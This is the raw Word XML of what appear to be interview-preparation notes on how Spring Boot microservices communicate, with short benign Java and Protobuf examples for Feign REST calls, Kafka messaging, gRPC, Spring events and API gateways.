    <w:p w14:paraId="13D127EB" w14:textId="683D4839"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="5EEA9404">
          <v:rect id="_x0000_i2659" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A47AF" w14:textId="4DB8992E" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="632" w:name="_Toc196308112"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I am having different microservices, if I want to invoke different microservice so how can we interact</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="632"/>
    </w:p>
    <w:p w14:paraId="6B22F25A" w14:textId="0510C2F8" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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o interact with different microservices in a microservices architecture, you generally use one of the following approaches, depending on the requirements and technologies you are using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B84EC6" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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RESTful API Calls (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2C0F1"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Microservices can communicate with each other using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can make HTTP requests from one microservice to another using various protocols like HTTP, HTTPS, or gRPC (for more efficient, binary-based communication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA0D489"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ypically, this can be done using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580676B1" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (older approach, synchronous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0445F0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (newer, more reactive, asynchronous approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFBAF4D" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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Feign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Spring Cloud, declarative HTTP client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80EFC4"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 with Feign Client (Spring Cloud):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B2765"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ervice A (Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA30477"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FeignClient(name = "service-b", url = "http://localhost:8081")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EF1A99"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interface ServiceBClient {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC69D4"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tMapping("/api/data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4A26F"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tring getDataFromServiceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6873E9"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E338796"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ervice A Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E56C71"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717E1AEB"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questMapping("/api/serviceA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB8A8E"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ServiceAController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F33B1" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714ED96D"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78F8196A"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ServiceBClient serviceBClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3EA39" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086D6A25"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tMapping("/invokeServiceB")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688DD452"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ring callServiceB() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417478D"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serviceBClient.getDataFromServiceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20A612"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7B8FBCB4"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447401F"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ervice B (Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73D37B"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284F6F2"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12024C8D"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ServiceBController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F7E42" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DB9D4C"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tMapping("/data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E0EB4"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ring getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6DBAA"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Data from Service B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D560584"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281E5D11"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2FE50CEC"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this example, Service A uses Feign to interact with Service B's RESTful API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D98F9" w14:textId="77777777" w:rsidR="00BA6A8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8C003C6">
          <v:rect id="_x0000_i2660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5236C3" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Message Brokers (Asynchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BBA6B"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For asynchronous communication, microservices can interact through </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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Kafka</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ActiveMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB8F88"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Microservices can publish messages to a message queue and subscribe to messages from other microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE4D7D"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approach is useful when you want decoupling and need to handle things like retries, failovers, and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFA2A1"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 with Spring Cloud Stream and Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEDBBF"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roducer (Service A)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sending messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40FF62"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ableBinding(Source.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A923A00"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C80551"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public class MessageProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280BCCF" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD81683"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6FE453BD"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MessageChannel output;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D63B0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70960B4F"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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CD4A1"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utput.send(MessageBuilder.withPayload(message).build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B5F2F1"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7635C1D8"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075A6173"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onsumer (Service B)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Receiving messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159347F"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ableBinding(Sink.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463FBD0F"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644C8E3"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MessageConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB572C" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AC215A"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treamListener(Sink.INPUT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8868E4"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handleMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CBB96"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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35252B48"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6DFA2F10"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31EC64B6"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this example, Service A sends a message to Kafka (using Spring Cloud Stream), and Service B listens for that message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0632C" w14:textId="77777777" w:rsidR="00BA6A8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5D90C8">
          <v:rect id="_x0000_i2661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F496CA5" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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gRPC (Remote Procedure Calls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9D1BA"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gRPC</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a high-performance RPC framework developed by Google, which uses HTTP/2 and Protobuf (Protocol Buffers) for efficient communication between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FB9F8"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RPC is used for low-latency, high-performance communication and supports bidirectional streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E1A10"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 with Spring Boot and gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725AAFC7"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Define the gRPC service using Protobuf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C164893"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yntax = "proto3";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAFCCE" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF136A9"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ice MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAEAB3"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pc GetData (Request) returns (Response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AD826"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8632536" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9768C0"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message Request {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A6950"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tring query = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6FA8E"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0B86E0EC" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506F6E36"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message Response {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3FB76"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tring data = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32C2A6"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C62198B"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nerate Java code from the Protobuf definition using protoc compiler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7ACF06"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lement the service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464F7BE"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rpcService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080F058"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MyServiceImpl extends MyServiceGrpc.MyServiceImplBase {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D911BE9" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E89F79"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AB907"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getData(Request request, StreamObserver&lt;Response&gt; responseObserver) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D913BD"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sponse response = Response.newBuilder().setData("Data from gRPC").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D71D77"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sponseObserver.onNext(response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259235F9"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sponseObserver.onCompleted();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D5FD4"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68C24811"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00539E5A"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lient calling the gRPC service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEA4EF"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ManagedChannel channel = ManagedChannelBuilder.forAddress("localhost", 6565)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A2E2E"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usePlaintext()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A7C45"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 xml:space="preserve">                                            .build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E2993"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MyServiceGrpc.MyServiceBlockingStub stub = MyServiceGrpc.newBlockingStub(channel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DC351" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585AEF3D"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quest request = Request.newBuilder().setQuery("Request data").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398D7E5"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ponse response = stub.getData(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F32C7"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ystem.out.println(response.getData());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BB3D1"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hannel.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE2342"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gRPC</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a more efficient communication mechanism compared to traditional REST for certain use cases, especially when performance and scalability are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB55A5" w14:textId="77777777" w:rsidR="00BA6A8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58817EE">
          <v:rect id="_x0000_i2662" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E117D65" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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4. Event-Driven Architecture (Event Sourcing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30047F75"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Microservices can publish and subscribe to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These events can be stored in an event store, and other services can subscribe to those events to take action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A7768"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is useful for implementing CQRS (Command Query Responsibility Segregation) or Event Sourcing patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3AAB2"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 with Spring Events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818474E"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ervice A (Publisher)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674509B"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774518E8"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EventPublisher {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D96AE0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE5F11D"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535FA1ED"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ApplicationEventPublisher publisher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3EA60" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD32038"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publishEvent(String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087D8C9"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sher.publishEvent(new MyEvent(this, data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26948C0F"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2BCDEACD"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15B57BAA"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ervice B (Listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55DD48"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F16F9A8"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EventListener {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F748E73" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1589CBB0"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ventListener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257E6B8"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onApplicationEvent(MyEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AFB21"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ystem.out.println("Event received: " + event.getData());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC11C79"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416E0E9F"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3633BA3C"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vent Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C6CC8"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MyEvent extends ApplicationEvent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35661E75"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String data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB3444"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2800CC4D"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MyEvent(Object source, String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA7745"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uper(source);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE6EFA"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his.data = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E44FA7"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72D0838B"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44536F72"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ring getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE73D4F"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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527D1D1"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13A94221"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F5AA18F" w14:textId="77777777" w:rsidR="00BA6A8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10AE60B">
          <v:rect id="_x0000_i2663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4E648" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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5. API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833313E"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PI Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to route requests between microservices. The gateway provides a single entry point into the system and can delegate requests to appropriate microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5169A"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Common tools: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway</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Zuul</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Kong</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Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
